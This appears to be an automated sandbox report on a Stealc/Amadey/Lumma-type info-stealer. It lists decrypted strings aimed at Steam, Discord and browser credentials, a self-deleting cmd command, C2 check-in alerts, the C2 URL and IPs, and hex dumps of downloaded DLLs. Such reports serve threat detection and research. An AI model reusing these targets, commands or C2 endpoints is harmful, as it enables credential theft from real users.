Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: done
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: https
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: build
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: token
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: file
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: message
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CBBA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB44C0 PK11_PubEncrypt,	0_2_6CBB44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CB84420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4440 PK11_PrivDecrypt,	0_2_6CBB4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CC025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CB9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CB98670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CBBA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CBDA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CBE0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CBB43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CBD7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CBDBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CB97D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CBD9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB3FF0 PK11_PrivDecryptPKCS1,	0_2_6CBB3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CBB3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CBB9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CBDDA40

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 14MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49740 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.8:57224 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.8:49743 -> 172.67.165.166:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49741

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Dec 2024 19:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 